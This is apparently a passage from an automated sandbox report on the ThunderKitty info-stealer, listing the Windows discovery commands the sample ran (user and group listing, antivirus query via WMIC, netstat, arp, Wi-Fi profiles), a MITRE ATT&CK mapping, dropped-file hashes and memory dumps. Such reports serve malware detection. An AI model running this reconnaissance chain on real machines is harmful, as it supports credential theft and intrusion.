    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1928
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:3732
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    PID:1392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:4396
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2424
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4804
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:464
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1036
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:3900
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
89f0b4c296d921ec8cd37a7d25e06157

SHA1
7a35866f29e260f261649e021cc8f26808188c52

SHA256
4f6f6ebf64ee0d8b1fc74e6c4bb79ab557538590ff77595ea8921fa8ac368e67

SHA512
c4b8181f8f5ea8b96b7a53d3b3935769f09accaef946291c69c8c8d7c2c33051c32c7beca086d56b114d6d81e67a718f51a9260135bd3a3cb4792ba22ce50ce4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
360B

MD5
42a3e507d48a9cb6215ca9938eab61eb

SHA1
58c18dbd1b4fc1f724093100eebb2b1deba3c42f

SHA256
7f80bfda515b23fe7c4d67bb7c8513fa8a41bd070f09fd587f1be757a12c1cc2

SHA512
97ac52563a533a781fc333f1304d5ace76101266ade0b50f6a83e469dc1f2a594fe5c7de317d805d753f18d1263f4dc1f4c9e8dc195a1fce27b75eff87c8aefd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0789009e381ff689e09144d17087b434

SHA1
43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

SHA256
120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

SHA512
4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.dll

Filesize
4KB

MD5
69116df6e887b86280d27665385f4e3f

SHA1
bd2512456e11976c16ed808ede040ddff8301669

SHA256
f256b2e143ade475f5b4c781caf08fd14ec9744dd2d71b63776f169e44a6772f

SHA512
e8bc299008a8eb650ad43d1fd3aeda5ad10a7f0912e08733cfe1cf9c228864bf52b1e7664adc93e374fa1b41585403fe339a29d3a922e4330e533433227465b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.dll

Filesize
4KB

MD5
a6a377a6b5aeac3e7d54e37437c79513

SHA1
0514eef7c7324f1d5327cf1519fb1dba4c681e6e

SHA256
820f2079dab9d1a1b2b2f2ee4521cab9c32a2b396144c277559ae652db1ed592

SHA512
ffc0226b98af3e33f27a8ea3429df0213d22241c566a10df3b394acd00d59d7c1aa8a52fc0a8010fff3d5215aa2fd42894a750ca8c6061e827d07bf4d684b9f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp

Filesize
1KB

MD5
543ce85203e686fcc270245d5c59e4dc

SHA1
07f57f133a0447f60c76caa2ccf4335707dd376c

SHA256
74157925d9953770e150533982a7ba71ddc9bc8c798da7a2113932a4805eba1f

SHA512
906e59ebb9eb9579c313eb7f7d6d45964cd6c4c0394343df15483a3d052f227d464985fdb0219ced9c7d1b96e76bce6b4c2c08a750b4295ef0d4b440db4c0960

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9961.tmp

Filesize
1KB

MD5
dfcc5317b57d5f62fc55a3343bf30a1f

SHA1
3a5c6653123be0affb70d1926f937166ba76b192

SHA256
5c18768976f14187a17580d8810831456d5b40648fd333abb060c1b61e4f245e

SHA512
deb8c9bf5234c71b69e1918e4a5eb83f33fc8c13507ba11e38d15b451da8896af85a1d1b912136ee339dd7192477d4b01a107720065c61d3fb5ffb8198ab046a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
1.5MB

MD5
716d6e406cc1b496c213ac5067a9e722

SHA1
f54674790e2f873fca814570fbe81539c847bf88

SHA256
5bad8a7104bc9f8b206a0578563483e49b7cb88b104eda7e58a57aad33547b64

SHA512
c2a29188894429d1ad850f4dce04c41e87ba9bf1ca8db59ff7ee3890f0cc3daf7400bc31a88c151ca446a0f0316aa1e4eb8bcf568266a7e2608a33c212c18fbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SensitiveFiles\SyncExport.txt

Filesize
1.4MB

MD5
272dfeca45d9c51434c255a8259d21d1

SHA1
802ec5f51f21812e300bce672b3f767ba1e78591

SHA256
87d2f1d3b25b1fd04c471271e24bf2357ced1bfa109784e516757113902aa5c9

SHA512
b7151b131fd072daa0d06e78aadf9ec5c946d2c93f741c26d55174779d9ea3bb05cd17ec1908f113070278c860c034bb39febabeb087b44e3daf397a86df9bd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
58KB

MD5
be89a582d40cbd9599acd2cb636de7a3

SHA1
fa149df86c526a1e825086850368f30515040285

SHA256
cad144e670f8fd44a6044fcb5d0a6c6d80eef89696cfea6bb252008d0698853c

SHA512
8083ae8013e3ccdfc0b0aa2315def310d8ede59d02ffef9556a87e2d1649bd273d38b89b7deedcfdea686834d49be746102ad70c49ae2fa2f09e97888496b146

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdef0ekn.2x0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.cmdline

Filesize
369B

MD5
41c81f682907c3644219b12566260694

SHA1
ddb34d8c66ab702163f07d85a7c217283c996dce

SHA256
4470ebcae6f5af6c3e8a5c821875d1c256485d21fd77020177438ea5f466c3df

SHA512
262bfcb6432cafcfae7bbf21ee7b52f0327947debfce3a4ef1161a89d6f96e38d0483cbe702ec9e714dd3a53d8c77974fd723dcfcfbcb8dc24511bb7badeb5da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\CSC7B7D72D1329743A59E4E29E7DDFD75E.TMP

Filesize
652B

MD5
70af3a6ba9b69c75fe051e0022f099cc

SHA1
f085fbc6be7ba1d883eebdbc86dc689548c3138c

SHA256
d2884149c704ea40b6c302a21a707e3830a38a9f7d94b7619edd0634893ed0cc

SHA512
abc7322dc02ddc1f3923df8ca647d88e5b68dedd963f30a9816897e854f8b9ae0f3a0228069335ba8dcc1dfe8d15f768b4e156f7af97af0c58f82ae3013fcca5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.cmdline

Filesize
369B

MD5
0e48c6fd0da9150ba09684f7d0c922b2

SHA1
d3c8f5de1f1e5f0049f5696e4f77e81cb4d386d9

SHA256
47bfb1cfbb8fb06716edf26ad254585338a670e067f4ab1ec9263ae34ac2a69c

SHA512
4247af2d4090de28415184cc5da5b2ffbf07df45de543c93d16a726e1cb070bac5f1ded6756758fa5ce22b3f3be213ef8e214ba0cbf8bb15938915f6b9b2743d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\CSCA67194F6663D4135954AB988437276B5.TMP

Filesize
652B

MD5
3bc4e92b8a2b790cd079601f61171058

SHA1
7f44224f10e3716cd78bb3da88f865defe9fcf99

SHA256
af2a7088bb30a0560d063b2e1602e9f2412ec0900d1ad9d18f91cca8e61784d5

SHA512
f77502c77700f81335cdf89325c338ad7176d7b04199ccc3b5e5faaabc2c96d81d08cf1a6a567a45b82d57b596709cb60387c0ddc3b993d95bb459b8ff4389af

Download Submit
memory/2212-68-0x000001C7A8030000-0x000001C7A8038000-memory.dmp

Filesize
32KB

Download
memory/2212-114-0x000001C7C0E40000-0x000001C7C0E52000-memory.dmp

Filesize
72KB

Download
memory/2212-75-0x000001C7C0E30000-0x000001C7C0E54000-memory.dmp

Filesize
144KB

Download
memory/2212-125-0x000001C7C0440000-0x000001C7C065C000-memory.dmp

Filesize
2.1MB

Download
memory/2212-74-0x000001C7C0E30000-0x000001C7C0E5A000-memory.dmp

Filesize
168KB

Download
memory/2212-70-0x000001C7C1370000-0x000001C7C1B16000-memory.dmp

Filesize
7.6MB

Download
memory/2212-115-0x000001C7C0E10000-0x000001C7C0E1A000-memory.dmp

Filesize
40KB

Download
memory/3512-38-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

Filesize
10.8MB

Download
memory/3512-65-0x00000218F4B60000-0x00000218F4B68000-memory.dmp

Filesize
32KB

Download
memory/3512-90-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

Filesize
10.8MB

Download
memory/3512-19-0x00000218DC9F0000-0x00000218DCA12000-memory.dmp

Filesize
136KB

Download
memory/3512-89-0x00000218F4D30000-0x00000218F4F4C000-memory.dmp

Filesize
2.1MB

Download
memory/3512-14-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

Filesize
10.8MB

Download
memory/3512-3-0x00007FFCD1793000-0x00007FFCD1795000-memory.dmp

Filesize
8KB

Download
memory/3612-51-0x0000020B9E0E0000-0x0000020B9E2FC000-memory.dmp

Filesize
2.1MB

Download